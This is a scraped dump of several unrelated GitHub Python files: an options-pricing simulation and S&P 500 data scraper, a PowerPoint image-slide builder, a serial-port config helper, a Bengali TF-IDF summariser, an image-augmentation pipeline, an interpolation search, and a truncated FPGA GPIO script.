numDays versus underlying's price\n # at entering the trade. At each underlying price numTrials simulations are done.\n xData = np.arange((priceAtEntry - 2), (priceAtEntry + 2), ((priceAtEntry - 2) + (priceAtEntry + 2)) / 100)\n for j in range(len(legs)):\n yData = []\n for i in xData:\n yData.append(runExcerciseTrial(legs[j], myStats, i, numDays, numTrials))\n\n fig1, (ax1) = plt.subplots(1, 1)\n ax1.set_title(\"{} Option Leg {} Pct Chance of Being Excercised\".format(ticker, (j + 1)))\n ax1.set_xlabel(\"Underlying Price at Entry\")\n ax1.set_ylabel(\"Probability of Being Excercised\")\n ax1.text((priceAtEntry - 2), 0.6, \"Number of Trials {}\".format(numTrials))\n ax1.text((priceAtEntry - 2), 0.55, \"There were {} days until expiration\".format(numDays))\n ax1.text((priceAtEntry - 2), 0.5, \"Strike Price is {}\".format(legs[j].strike))\n ax1.plot(xData, yData)\n plt.show()\n\n # Plot the yield curve for the option chain and a histogram of distribution of yields for numTtrial simulations\n someX, someY = plotOption(0.75 * priceAtEntry, 1.25 * priceAtEntry, legs)\n yields = runPriceTrial(myStats, priceAtEntry, numDays, numTrials, legs)\n num_bins = 20\n\n c = Counter(yields)\n mostCommon = c.most_common(3)\n top = mostCommon[0][1] # want to find top left corner to position text in fig2\n left = np.min(yields) #\n first = mostCommon[0][0]\n firstPercent = round(((mostCommon[0][1] / numTrials) * 100), 2)\n second = mostCommon[1][0]\n secondPercent = round(((mostCommon[1][1] / numTrials) * 100), 2)\n third = mostCommon[2][0]\n thirdPercent = round(((mostCommon[2][1] / numTrials) * 100), 2)\n\n fig2, (ax1, ax2) = plt.subplots(2, 1)\n ax1.set_title(\"{} Option Chain Yield\".format(ticker))\n ax1.set_xlabel(\"Underlying Price\")\n ax1.set_ylabel(\"Yield\")\n ax1.plot(someX, someY)\n ax2.set_title(\"{} Option Chain Yield Histogram\".format(ticker))\n ax2.set_xlabel(\"Yield\")\n ax2.set_ylabel(\"Trials at Yield\")\n ax2.text(left, 0.95 * top, \"Number of Trials {}\".format(numTrials))\n ax2.text(left, 0.825 * top, \"There were {} days until expiration\".format(numDays))\n ax2.text(left, 0.70 * top, \"Most common is {} at {}%\".format(first, 
firstPercent))\n ax2.text(left, 0.575 * top, \"2nd most common is {} at {}%\".format(second, secondPercent))\n ax2.text(left, 0.45 * top, \"3rd most common is {} at {}%\".format(third, thirdPercent))\n ax2.hist(yields, num_bins)\n\n fig2.tight_layout(h_pad=0.5)\n plt.show()\n\ndef getOptionData(where = \"J:\\computationalFinance\\Option Chain1.html\", when = \"Apr 7 2017\"):\n \"\"\"\n Scrapes HTML from Ameritrade using BueautifulSoup. Pulls out option tables for calls and\n puts for a given date\n\n where: location of data\n when: date of options\n return: data frame with call data, data frame with put data\n \"\"\"\n try:\n page = open(where)\n soup = BeautifulSoup(page.read())\n except:\n print(\"Try Again, bad URL\")\n return (), ()\n\n try:\n tableRow = soup.find(id = (\"header\" + when)) #find table row with id containing header and our date\n except:\n print(\"Try again, bad date\")\n return (), ()\n\n tableBody = tableRow.find_parent() #we want the tably body\n\n optionTitleRow = tableBody.select(\".optionTypeTitle\") #table is split into call/puts each has a CSS class optionTypeTitle\n row0is = optionTitleRow[0].get_text()\n\n if (row0is.strip() == 'Calls'):\n calls = optionTitleRow[0].find_parent().find_parent() #go up two levels to find table body\n puts = optionTitleRow[1].find_parent().find_parent()\n else:\n calls = optionTitleRow[1].find_parent().find_parent()\n puts = optionTitleRow[0].find_parent().find_parent()\n\n callRows = calls.find_all(\"tr\")\n putRows = puts.find_all(\"tr\")\n callQuotes = [] #list of tupples each of which contains option quote data\n putQuotes = []\n\n #build callQuotes list of tupples\n for i in range(1, len(callRows)): #first row is just header info\n temp = callRows[i].find_all(\"td\")\n temp2 = ()\n for j in range(len(temp)):\n quotePiece = temp[j].get_text().strip() #get piece of individual quote\n if quotePiece != \"\":\n temp2 = temp2 + (quotePiece,) #add piece to the tupple\n else:\n continue\n callQuotes.append(temp2)\n\n #build putQuotes list of tupples\n for i in range(1, len(putRows)):\n temp = putRows[i].find_all(\"td\")\n temp2 = ()\n for j in range(len(temp)):\n quotePiece = temp[j].get_text().strip()\n if quotePiece != \"\":\n temp2 = temp2 + (quotePiece,)\n else:\n continue\n putQuotes.append(temp2)\n\n tableColumns = [\"Strike\", \"Bid\", \"Ask\", \"Last\", \"Change\", \"Vol\", \"Open Int\"]\n calls = pd.DataFrame(index = np.arange(len(callQuotes)), columns = tableColumns)\n puts = pd.DataFrame(index = np.arange(len(callQuotes)), columns = tableColumns)\n\n for i in range(len(callQuotes)):\n tempRow = []\n for j in range(len(tableColumns)):\n dataItem = callQuotes[i][j].split()[0]\n dataItem = dataItem.replace(',', '')\n dataItem = dataItem.replace('--', '0')\n tempRow.append(round(float(dataItem), 2))\n calls.iloc[i] = tempRow\n\n for i in range(len(putQuotes)):\n tempRow = []\n for j in range(len(tableColumns)):\n dataItem = callQuotes[i][j].split()[0]\n dataItem = dataItem.replace(',', '')\n dataItem = dataItem.replace('--', '0')\n tempRow.append(round(float(dataItem), 2))\n puts.iloc[i] = tempRow\n\n return calls, puts\n\ndef save_sp500tickers():\n \"\"\"\n Read SP500 stock symbols from Wikipedia and write them in a pickle\n dependency: lxml parser be installed\n return: list of SP500 stock symbols\n \"\"\"\n tickers = []\n\n #changed from http to https\n resp = requests.get('https://en.wikipedia.org/wiki/List_of_S%26P_500_companies')\n soup = BeautifulSoup(resp.text, 'lxml')\n table = soup.find('table', {'class': 'wikitable 
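A self-contained sketch of the row/cell walk that getOptionData and save_sp500tickers perform, run against an inline HTML snippet so it does not depend on Ameritrade or Wikipedia being reachable:

from bs4 import BeautifulSoup

html = """<table class="wikitable sortable">
<tr><th>Symbol</th></tr>
<tr><td>MMM</td></tr>
<tr><td>AOS</td></tr>
</table>"""
soup = BeautifulSoup(html, "html.parser")
table = soup.find("table", {"class": "wikitable sortable"})
tickers = [row.findAll("td")[0].text for row in table.findAll("tr")[1:]]
print(tickers)  # ['MMM', 'AOS']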
sortable'})\n\n for row in table.findAll('tr')[1:]:\n ticker = row.findAll('td')[0].text\n tickers.append(ticker)\n\n with open(\"sp500tickers.pickle\", \"wb\") as f:\n pickle.dump(tickers, f)\n\n return tickers\n\ndef get_data_from_yahoo(start, stop, reload_sp500=False):\n \"\"\"\n\n start: string, format = \"YYYY-M-D\"\n stop: string, format = \"YYYY-M-D\"\n reload_sp500: when true SP500 Tickers will be regenerated\n return: null\n \"\"\"\n if reload_sp500:\n tickers = save_sp500tickers()\n else:\n with open(\"sp500tickers.pickle\",\"rb\") as f:\n tickers = pickle.load(f)\n\n if not os.path.exists('stock_dfs'):\n os.makedirs('stock_dfs')\n\n for ticker in tickers[:5]: #just do five for now\n if not os.path.exists('stock_dfs/{}.csv'.format(ticker)):\n df = getMeData(ticker, start, stop)\n df.to_csv('stock_dfs/{}.csv'.format(ticker))\n time.sleep(0.5) #don't piss yahoo off\n else:\n print('Already have {}'.format(ticker))\n\n return\n\ndef compile_data():\n \"\"\"\n Reads the data frames of individual tickers, throws out all comlumns other than adjusted close, and\n then joins into one big data frame\n return: data frame with adjusted close of all SP500 companies\n store: sp500_joined_closes.csv\n \"\"\"\n\n with open(\"sp500tickers.pickle\",\"rb\") as f:\n tickers = pickle.load(f)\n\n main_df = pd.DataFrame()\n\n for count,ticker in enumerate(tickers[:5]): #just do 5 for now\n df = pd.read_csv('stock_dfs/{}.csv'.format(ticker))\n df.set_index('Date', inplace=True)\n df.rename(columns={'Adj Close':ticker}, inplace=True)\n df.drop(['Open','High','Low','Close','Volume'],1,inplace=True)\n if main_df.empty:\n main_df = df\n else:\n main_df = main_df.join(df, how='outer')\n\n main_df.to_csv('sp500_joined_closes.csv')\n return main_df\n\ndef visualize_data():\n \"\"\"\n Calculate the correlation of every ticker to every other ticker in the master data frame and then\n display as a heatmap\n return: data frame with the correlations\n \"\"\"\n df = pd.read_csv('sp500_joined_closes.csv')\n df_corr = df.corr()\n df_corr.to_csv('sp500corr.csv')\n\n data1 = df_corr.values\n fig1 = plt.figure()\n ax1 = fig1.add_subplot(111)\n heatmap1 = ax1.pcolor(data1, cmap=plt.cm.RdYlGn)\n fig1.colorbar(heatmap1)\n ax1.set_xticks(np.arange(data1.shape[1]) + 0.5, minor=False)\n ax1.set_yticks(np.arange(data1.shape[0]) + 0.5, minor=False)\n ax1.invert_yaxis()\n ax1.xaxis.tick_top()\n column_labels = df_corr.columns\n row_labels = df_corr.index\n ax1.set_xticklabels(column_labels)\n ax1.set_yticklabels(row_labels)\n plt.xticks(rotation=90)\n heatmap1.set_clim(-1.0, 1.0)\n plt.tight_layout()\n # plt.savefig(\"correlations.png\", dpi = (300))\n plt.show()\n\n return df_corr\n\n\ndef process_data_for_labels(ticker):\n \"\"\"\n\n :param ticker:\n :return:\n \"\"\"\n hm_days = 7\n df = pd.read_csv('sp500_joined_closes.csv', index_col=0)\n tickers = df.columns.values.tolist()\n df.fillna(0, inplace=True)\n\n for i in range(1, hm_days + 1):\n df['{}_{}d'.format(ticker, i)] = (df[ticker].shift(-i) - df[ticker]) / df[ticker]\n\n df.fillna(0, inplace=True)\n return tickers, df\n\ndef buy_sell_hold(*args):\n \"\"\"\n\n :param args:\n :return:\n \"\"\"\n cols = [c for c in args]\n requirement = 0.02\n for col in cols:\n if col > requirement:\n return 1\n if col < -requirement:\n return -1\n return 0\n\ndef extract_featuresets(ticker):\n \"\"\"\n\n :param ticker:\n :return:\n \"\"\"\n tickers, df = process_data_for_labels(ticker)\n\n df['{}_target'.format(ticker)] = list(map( buy_sell_hold,\n df['{}_1d'.format(ticker)],\n 
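A toy illustration of the forward-return labels that process_data_for_labels builds with shift(-i); the ticker name and prices below are made up:

import pandas as pd

df = pd.DataFrame({"ABC": [10.0, 10.5, 10.2, 11.0]})
for i in range(1, 3):
    # Percent change from today's close to the close i days ahead.
    df[f"ABC_{i}d"] = (df["ABC"].shift(-i) - df["ABC"]) / df["ABC"]
print(df.round(3))  # trailing rows are NaN: no i-day-ahead close exists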
df['{}_2d'.format(ticker)],\n df['{}_3d'.format(ticker)],\n df['{}_4d'.format(ticker)],\n df['{}_5d'.format(ticker)],\n df['{}_6d'.format(ticker)],\n df['{}_7d'.format(ticker)] ))\n\n vals = df['{}_target'.format(ticker)].values.tolist()\n str_vals = [str(i) for i in vals]\n print('Data spread:', Counter(str_vals))\n\n df.fillna(0, inplace=True)\n df = df.replace([np.inf, -np.inf], np.nan)\n df.dropna(inplace=True)\n\n df_vals = df[[ticker for ticker in tickers]].pct_change()\n df_vals = df_vals.replace([np.inf, -np.inf], 0)\n df_vals.fillna(0, inplace=True)\n\n X = df_vals.values\n y = df['{}_target'.format(ticker)].values\n\n return X, y, df\n\n#******************************************************************************\n#****************************** Classes ***************************************\n#******************************************************************************\n\n\nclass callOption():\n \"\"\"\n Encapsulation of a call options properties and methods.\n Things to do:\n add Greeks\n add Pricing Model\n add web data retrieval\n ???\n \"\"\"\n\n def __init__(self, price, fee, strike, quantity, buy, covered = False):\n self.price = price\n self.fee = fee\n self.strike = strike\n self.quantity = quantity\n self.buy = buy\n self.covered = covered\n if buy:\n self.initial = -(quantity * 100 * price) - fee\n else:\n self.initial = (quantity * 100 * price) - fee\n\n def findPL(self, currentPrice):\n result = self.initial\n breakEven = 0\n if self.buy:\n if currentPrice >= (self.strike + 0.01):\n result = self.initial + 100 * self.quantity * (currentPrice - self.strike)\n else: #sell\n if currentPrice >= (self.strike + 0.01):\n result = self.initial - 100 * self.quantity * (currentPrice - self.strike)\n return result\n\n def inMoney(self, currentPrice):\n result = 0\n if currentPrice >= (self.strike + 0.01):\n result = 1\n\n return result\n\n\nclass putOption():\n \"\"\"\n Encapsulation of a put options properties and methods.\n Things to do:\n add Greeks\n add Pricing Model\n add web data retrieval\n ???\n \"\"\"\n def __init__(self, price, fee, strike, quantity, buy, covered = False):\n self.price = price\n self.fee = fee\n self.strike = strike\n self.quantity = quantity\n self.buy = buy\n self.covered = covered\n if buy:\n self.initial = -(quantity * 100 * price) - fee\n else:\n self.initial = (quantity * 100 * price) - fee\n\n def findPL(self, currentPrice):\n result = self.initial\n breakEven = 0\n if self.buy:\n if currentPrice <= (self.strike - 0.01):\n result = self.initial + 100 * self.quantity * (self.strike - currentPrice)\n else: #sell\n if currentPrice <= (self.strike - 0.01):\n result = self.initial - 100 * self.quantity * (self.strike - currentPrice)\n return result\n\n def inMoney(self, currentPrice):\n result = 0\n if currentPrice <= (self.strike - 0.01):\n result = 1\n\n return result\n\n#******************************************************************************\n#****************************** Sandbox ***************************************\n#******************************************************************************\n\n\nbuildSimulateChain()\n\n\n\n# callQuotes, putQuotes = getOptionData()\n#\n# print(callQuotes)\n# print(putQuotes)\nstyle.use('ggplot')\nstart = dt.datetime(2016, 1, 2)\nstop = dt.datetime(2017, 3, 27)\n\n#mySP500 = save_sp500tickers()\n#print(mySP500)\n\n#get_data_from_yahoo(\"2016-1-2\", \"2017-3-27\")\n#df = compile_data()\n#df = visualize_data()\n#tickers, df = process_data_for_labels(\"ABBV\")\n#_, _, df = 
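A self-contained check of the expiration P/L convention that callOption.findPL implements, for one bought contract, ignoring the one-cent exercise threshold the class uses; strike 50, 1.00 premium, and 5.00 fee are illustrative numbers:

def call_pl(price, strike=50.0, premium=1.0, qty=1, fee=5.0):
    initial = -(qty * 100 * premium) - fee            # debit paid to open
    intrinsic = max(price - strike, 0.0) * 100 * qty  # value if exercised
    return initial + intrinsic

for p in (45.0, 50.0, 51.05, 60.0):
    print(p, call_pl(p))  # breakeven at 51.05: -105 + 105 = 0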
extract_featuresets(\"ABBV\")\n#print(df.head())\n\ntry:\n# df = altGetMeData(\"GE\", start, stop)\n df = web.DataReader(\"GE\", \"yahoo\", start, stop)\nexcept:\n df = getMeData(\"GE\", \"2016-1-2\", \"2017-3-27\")\ndf.to_csv(\"GE.csv\")\ndf = pd.read_csv(\"GE.csv\", parse_dates = True, index_col = 0)\n\n_, newDF = getMeStats(df)\n#plt.xticks(rotation=70)\n# plt.plot(newDF.index, newDF[\"Close\"], newDF.index, newDF[\"Change\"], newDF.index, newDF[\"50D_MA\"])\n# _, myLabels = plt.xticks()\n# for label in myLabels:\n# label.set_rotation(45)\n# plt.tight_layout()\n#df.plot(subplots = True, sharex = True)\n\n#plt.show()\n\nfig, (ax1, ax2) = plt.subplots(2, 1, sharex = True)\nax1.plot(newDF.index, newDF[\"Close\"], newDF.index, newDF[\"50D_MA\"])\nax2.plot(newDF[\"Change\"])\n_, myLabels = plt.xticks()\nfor label in myLabels:\n label.set_rotation(45)\n\nplt.tight_layout()\nplt.show()\n\n\n#print(df.head())\n\nmoreData = fetchGF(\"GE\")","repo_name":"jmars3k/finTechOptions","sub_path":"optionHeuristics.py","file_name":"optionHeuristics.py","file_ext":"py","file_size_in_byte":25870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"12103291701","text":"import pptx\nfrom pptx.util import Inches\nfrom pptx import Presentation\nimport glob\nimport os\n\n#reference url: https://qiita.com/aykbzl/items/09b52fabb3af6b925fb9\n\nppt = Presentation()\nwidth = ppt.slide_width\nheight = ppt.slide_height\n\n#使用するスライドの種類\ntitle_slide_layout = ppt.slide_layouts[0] #Title Slideの作成\nbullet_slide_layout = ppt.slide_layouts[1] #Title and Contentの作成\nblank_slide_layout = ppt.slide_layouts[6] #Blankの作成\n\n#Title Slide\nslide = ppt.slides.add_slide(title_slide_layout)\ntitle = slide.shapes.title\nsubtitle = slide.placeholders[1]\n\n#title_text = input(\"Title: \")\n#subtitle_text = input(\"Subtitle: \")\n\ntitle_text = \"\"\nsubtitle_text = \"\"\n\n\ntitle.text = title_text\nsubtitle.text = subtitle_text\n\n#get images\nfnms = glob.glob('*.png')\n#print(fnms)\ntx_left = tx_top = tx_width = tx_height = Inches(1)\ni = 1\nfor fnm in fnms:\n #insert images\n slide_picture = ppt.slides.add_slide(blank_slide_layout)\n pic = slide_picture.shapes.add_picture(fnm, width, height, width, height)\n pic.left = int((width -pic.width)/2)\n pic.top = int((width -pic.height)/2)\n #insert a textbox\n txBox = slide_picture.shapes.add_textbox(tx_left, tx_top/2, tx_width, tx_height)\n tB = txBox.text_frame\n tB.text = \"No. 
\" + str(i)\n i += 1\nppt.save('figure_zircon.pptx')\nos.system(\"open figure_zircon.pptx\")\n","repo_name":"sotaniki/u_th_pb_dating","sub_path":"figure_output.py","file_name":"figure_output.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"21980810399","text":"from json import loads, dumps\nfrom SerialComs import serial_ports\n\ndef portsCom() -> str:\n \"\"\"Select a serial port to communicate with an arduino\n\n Returns:\n str: the serial port selected\n \"\"\"\n\n ports = serial_ports()\n\n p = \"\"\n for i in range(len(ports)):\n p += \"%d - \" % (i+1) + ports[i] + \"\\n\"\n\n\n #select the serial port\n i = 0\n while i - 1 not in range(len(ports)):\n i = int(input(\"Choose a serial port:\\n%s\\n\\n>>>\" % (p)))\n\n # error message\n if i - 1 not in range(len(ports)):\n print(\"Invalid option!\")\n \n create_configs(ports[i-1])\n\n return ports[i-1]\n\ndef load_configs():\n \"\"\"Tries to read a config file to look for a serial port.\\n\n If it doesn't exist, a new one is created\n\n Returns:\n str: the serial port\n \"\"\"\n # try to read the configs file\n try:\n with open(\"settings.json\", \"r\") as f:\n config = loads(f.read())\n port = config[\"port\"]\n\n # create a new file if it doesn't exist\n except:\n print(\"No configuration detected.\")\n port = portsCom()\n\n return port\n\n\ndef create_configs(port: str):\n \"\"\"Creates a settings file with the selected port\n\n Args:\n port (str): the selected port\n \"\"\"\n\n #create the config file with the selected port\n try:\n with open(\"settings.json\", \"w\") as f:\n f.write(dumps({\"port\":port}, indent=4))\n\n except:\n print(\"ERROR: Impossible to create configuration file!\")\n return port\n\n print(\"Created a configuration file: settings.json\")","repo_name":"ricardo-quintela/SimRacingSetup","sub_path":"hanbrake_revLights/src/ConfigFiles.py","file_name":"ConfigFiles.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"8756953280","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Aug 19 08:18:31 2020\r\n\r\n@author: anant\r\n\"\"\"\r\n\r\nimport nltk\r\nimport os\r\nimport re\r\nimport math\r\nimport operator\r\nfrom banglakit import lemmatizer as lem\r\nfrom banglakit.lemmatizer import BengaliLemmatizer\r\nfrom banglakit.lemmatizer.consts import *\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import word_tokenize\r\nfrom PyRouge.pyrouge import Rouge\r\n\r\n\r\n\r\nStopwords = set(stopwords.words(\"stopwords-bn\"))\r\nlemmatizer = BengaliLemmatizer()\r\n\r\n\r\ndef sentence_tokenize(text):\r\n sentences = re.compile('[।!?] 
').split(text)\r\n sentences\r\n return sentences\r\n\r\n\r\ndef lemmatize_words(words): \r\n lemmatized_words = []\r\n for word in words:\r\n p = re.sub(r'\\d+', '', lemmatizer.lemmatize(word, pos='verb'))\r\n p = lemmatizer.lemmatize(p, pos='noun')\r\n lemmatized_words.append(p)\r\n return lemmatized_words\r\n\r\n\r\ndef freq(words):\r\n words = [word for word in words]\r\n dict_freq = {}\r\n words_unique = []\r\n for word in words:\r\n if word not in words_unique:\r\n words_unique.append(word)\r\n for word in words_unique:\r\n dict_freq[word] = words.count(word)\r\n return dict_freq\r\n\r\ndef tf_score(word,sentence):\r\n freq_sum = 0\r\n word_frequency_in_sentence = 0\r\n len_sentence = len(sentence)\r\n for word_in_sentence in sentence.split():\r\n if word == word_in_sentence:\r\n word_frequency_in_sentence = word_frequency_in_sentence + 1\r\n tf = word_frequency_in_sentence/ len_sentence\r\n return tf\r\n\r\ndef idf_score(no_of_sentences,word,sentences):\r\n no_of_sentence_containing_word = 0\r\n for sentence in sentences:\r\n sentence = re.sub(r'\\d+', '', sentence)\r\n sentence = sentence.split()\r\n sentence = [word for word in sentence if word not in Stopwords and len(word)>1]\r\n sentence = [word for word in sentence]\r\n sentence = [lemmatize_words(word) for word in sentence]\r\n \r\n if word in sentence:\r\n no_of_sentence_containing_word = no_of_sentence_containing_word + 1\r\n idf = math.log10(no_of_sentences/no_of_sentence_containing_word)\r\n return idf\r\n\r\ndef tf_idf_score(tf,idf):\r\n return tf*idf\r\n\r\ndef word_tfidf(dict_freq,word,sentences,sentence):\r\n word_tfidf = []\r\n tf = tf_score(word,sentence)\r\n idf = idf_score(len(sentences),word,sentences)\r\n tf_idf = tf_idf_score(tf,idf)\r\n return tf_idf\r\n\r\ndef sentence_importance(sentence,dict_freq,sentences):\r\n sentence_score = 0\r\n sentence = re.sub(r'\\d+', '', sentence)\r\n no_of_sentences = len(sentences)\r\n for word in sentence:\r\n if word not in Stopwords and word not in Stopwords and len(word)>1: \r\n word = lemmatize_words(word)\r\n sentence_score = sentence_score + word_tfidf(dict_freq,word,sentences,sentence)\r\n return sentence_score\r\n############\r\n'''pos tag er kaj lemmatization korar shomoy ek shathei kore felsi.\r\n ekta file e pos gula tag kora chilo. ekhon iteration chalanor shomoy je word ta\r\n mile geche shetar root word shei pos onushare kore dilei hobe.\r\n jemon kono ekta word er pos noun holo tokhon noun er root word ber korar niom/rule onushare \r\n root word ber korbo. 
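A dependency-free sketch of the tf * idf score the summariser assigns per word, with a guard for the zero-containment case that idf_score above would otherwise divide by; toy English tokens stand in for the Bengali pipeline:

import math

def tf(word, sentence_words):
    return sentence_words.count(word) / len(sentence_words)

def idf(word, tokenized_sentences):
    containing = sum(word in s for s in tokenized_sentences)
    # log10(N / n_containing), or 0.0 when no sentence contains the word.
    return math.log10(len(tokenized_sentences) / containing) if containing else 0.0

sents = [["the", "cat", "sat"], ["the", "dog", "ran"], ["cat", "and", "dog"]]
print(round(tf("cat", sents[0]) * idf("cat", sents), 3))  # 0.059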
noun, verb, prottek er jonno alada rule er file ache.Banglakit e.\r\n'''\r\n############\r\nfile = 'G:/EWU/_Current_course/thesis/codes/input.txt'\r\nfile = open(file , 'r',encoding=\"utf8\")\r\ntext = file.read()\r\ntokenized_sentence = sentence_tokenize(text)\r\ntext = re.sub(r'\\d+', '', text)\r\ntokenized_words_with_stopwords = word_tokenize(text)\r\ntokenized_words = [word for word in tokenized_words_with_stopwords if word not in Stopwords]\r\ntokenized_words = [word for word in tokenized_words if len(word) > 1]\r\ntokenized_words = lemmatize_words(tokenized_words)\r\nword_freq = freq(tokenized_words)\r\n\r\ninput_user = int(input('Number of lines to retain:'))\r\nno_of_sentences = input_user\r\n#print(no_of_sentences)\r\n\r\nc = 1\r\nsentence_with_importance = {}\r\nfor sent in tokenized_sentence:\r\n sentenceimp = sentence_importance(sent,word_freq,tokenized_sentence)\r\n sentence_with_importance[c] = sentenceimp\r\n c = c+1\r\n\r\nsentence_with_importance = sorted(sentence_with_importance.items(), key=operator.itemgetter(1),reverse=True)\r\n\r\ncnt = 0\r\nsummary = []\r\nsentence_no = []\r\nfor word_prob in sentence_with_importance:\r\n if cnt < no_of_sentences:\r\n sentence_no.append(word_prob[0])\r\n cnt = cnt+1\r\n else:\r\n break\r\n \r\nsentence_no.sort()\r\ncnt = 1\r\nfor sentence in tokenized_sentence:\r\n if cnt in sentence_no:\r\n summary.append(sentence)\r\n cnt = cnt+1\r\n \r\nsummary = \" \".join(summary)\r\nprint(\"\\n\")\r\nprint(\"Summary:\")\r\nprint(summary)\r\noutF = open('summary.txt',\"w\",encoding=\"utf8\")\r\noutF.write(summary)\r\n\r\n\r\nr = Rouge()\r\n \r\nsystem_generated_summary = summary\r\nmanual_summmary = \"নাসা আগামী এপ্রিলের মধ্যে চারটি প্রস্তাব থেকে দুটি গ্রহ বিজ্ঞান মিশনের অনুমোদনের কথা বিবেচনা করছে। এর মধ্যে একটি হ'ল শুক্রকে নির্ধারণ করার জন্য এটি জীবনকে লালন করে কিনা। সোমবার একটি আন্তর্জাতিক গবেষণা দল বর্ণনা করেছে যে ভেনাসিয়ার মেঘে থাকা সম্ভাব্য জীবাণুগুলির কোনও প্রমাণ রয়েছে। এছাড়াও ফসফাইন রয়েছে যেখানে অক্সিজেনমুক্ত পরিবেশে ব্যাকটিরিয়া থাকতে পারে। এগুলি দৃড় প্রমাণ দেয় যে এখনও পৃথিবী ছাড়িয়ে জীবন রয়েছে। মার্কিন যুক্তরাষ্ট্রের মহাকাশ সংস্থা ফেব্রুয়ারিতে চারটি মিশনকে শর্টলিস্ট করেছিল যা নাসা প্যানেল দ্বারা পর্যালোচনা করা হয় এবং এর মধ্যে দুটি ভেনাসে রোবোটিক প্রোব জড়িত। DAVINCI + নামের একটিকে ভেনুসিয়ান বায়ুমণ্ডলে প্রেরণ করা হবে।\"\r\n\r\n[precision, recall, f_score] = r.rouge_l([system_generated_summary], [manual_summmary])\r\n\r\nprint(\"\\nPrecision is :\"+str(precision)+\"\\nRecall is :\"+str(recall)+\"\\nF Score is :\"+str(f_score))\r\n","repo_name":"ananta6d595/Bangla-text-Summarisation-with-Improved-Method","sub_path":"MainSummariserProgram.py","file_name":"MainSummariserProgram.py","file_ext":"py","file_size_in_byte":6767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"14850497302","text":"import albumentations as A\nimport cv2\n\ntransforms = A.Compose([\n A.CLAHE(clip_limit=4.0, tile_grid_size=(8, 8), p=0.25, always_apply=False),\n A.Rotate(limit=3, border_mode=cv2.BORDER_CONSTANT, p=1.0),\n A.Cutout(num_holes=10, p=0.75),\n A.GridDistortion(distort_limit=0.15, border_mode=cv2.BORDER_CONSTANT, p=0.75),\n A.Blur(blur_limit=3, p=0.5),\n A.JpegCompression(quality_lower=75, p=0.5),\n A.MotionBlur(blur_limit=3, p=0.75)\n])\n","repo_name":"NastyBoget/hrtr","sub_path":"src/dataset/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"96"} 
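A minimal usage sketch for an albumentations pipeline like the `transforms` object above (the file name and the one-transform stand-in pipeline are hypothetical; the point is that a Compose object is called with named arrays and returns a dict of augmented targets):

import albumentations as A
import cv2

transforms = A.Compose([A.Blur(blur_limit=3, p=0.5)])  # stand-in for the pipeline defined above
image = cv2.imread('sample.png')                       # hypothetical input image (BGR numpy array)
augmented = transforms(image=image)['image']           # Compose returns a dict keyed by target name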
+{"seq_id":"32204577686","text":"'''\n보간 검색(Interpolation Search)\n 이진 검색을 보완한 검색 알고리즘\n\n 값의 분포에 따라 중앙값의 위치를 예측하며,\n 예측한 위치에 있는 값이 탐색 대상보다\n 큰지 작은지에 따라 탐색 범위를 좁혀가며 탐색합니다.\n\n 이 알고리즘은 값의 분포가 고르지 않은 경우에는\n 이진 검색보다 성능이 떨어질 수 있습니다.\n\n이진 탐색\npos = (low + high)/2\n\n보간 탐색\n\n배열의 중간값(mid)과 찾으려는 값(value)의 상대적인 위치 비율을 계산합니다.\nposition = (value - min_value) / (max_value - min_value)\n배열의 중간값(mid)을 다음과 같은 공식으로 계산합니다:\nmid = left + int((right - left) * position)\n'''\ndef interpolation_search(arr, target):\n # 탐색 범위의 시작점과 끝점을 지정한다\n left, right = 0, len(arr) - 1\n # 탐색 범위가 존재하는 동안 반복한다\n while left <= right:\n # 값의 분포에 따라 중앙값의 위치를 예측한다\n pos = left + int((float(right - left) / (arr[right] - arr[left])) * (target - arr[left]))\n\n print(\"pos : \",pos)\n print(\"target : \",target)\n\n # 예측한 위치가 배열 범위를 벗어나는 경우, 탐색 대상이 없다고 판단한다\n if pos < 0 or pos >= len(arr):\n return -1\n # 예측한 위치에 탐색 대상이 있는 경우, 인덱스를 반환한다\n if arr[pos] == target:\n return pos\n # 예측한 위치에 탐색 대상보다 큰 값이 있는 경우, 오른쪽 부분 배열을 탐색한다\n elif arr[pos] < target:\n left = pos + 1\n # 예측한 위치에 탐색 대상보다 작은 값이 있는 경우, 왼쪽 부분 배열을 탐색한다\n else:\n right = pos - 1\n # 탐색 대상을 찾지 못한 경우 -1을 반환한다\n return -1\n\n\narr = [1, 3, 5, 7, 9,12,15,17,22,28,99,101,106]\ntarget =22\nresult = interpolation_search(arr, target)\nprint(result) # 2","repo_name":"dobbyfree23/PythonProjectPro","sub_path":"Day13/Search/Ex03-InterpolationSearch.py","file_name":"Ex03-InterpolationSearch.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"13231491254","text":"import corr, time\nimport numpy as np\nimport struct\nimport matplotlib.pyplot as plt\n\nIP = '192.168.1.12'\nbof = 'test_gpio2.bof'\n\nfpga = corr.katcp_wrapper.FpgaClient(IP)\ntime.sleep(3)\nfpga.upload_program_bof(bof, 3000)\n\nfpga.write_int('reset', 1)\nfpga.write_int('reset', 0)\n\"\"\"\nbbox_vals = np.zeros(49)\nfor i in range(0, 49):\n fpga.write_int('index', i)\n bbox_vals[i] = fpga.read_int('bbox_out')\n\"\"\"\n\"\"\"\nopen(data_filename, 'w').close()\nf = file(data_filename, 'a')\nraw_data = fpga.read('data', 2**15, 0)\nf.write(raw_data)\nf.close()\nprint 'listoco'\n\n#parse the gpio readings\n\nreg_bitsize = 128\naddr = 2**11\ndata_filename = 'gpio_data'\nfr = file(data_filename, 'r')\n\nn_lectures = reg_bitsize*addr\nn_lect_in_char = str(n_lectures/8)\nparse_input = struct.unpack('>'+n_lect_in_char+'b', fr.read(n_lectures))\nfr.close()\nplt.plot(parse_input)\nplt.show()\n\"\"\"\ndef read_gpio(n_lectures):\n 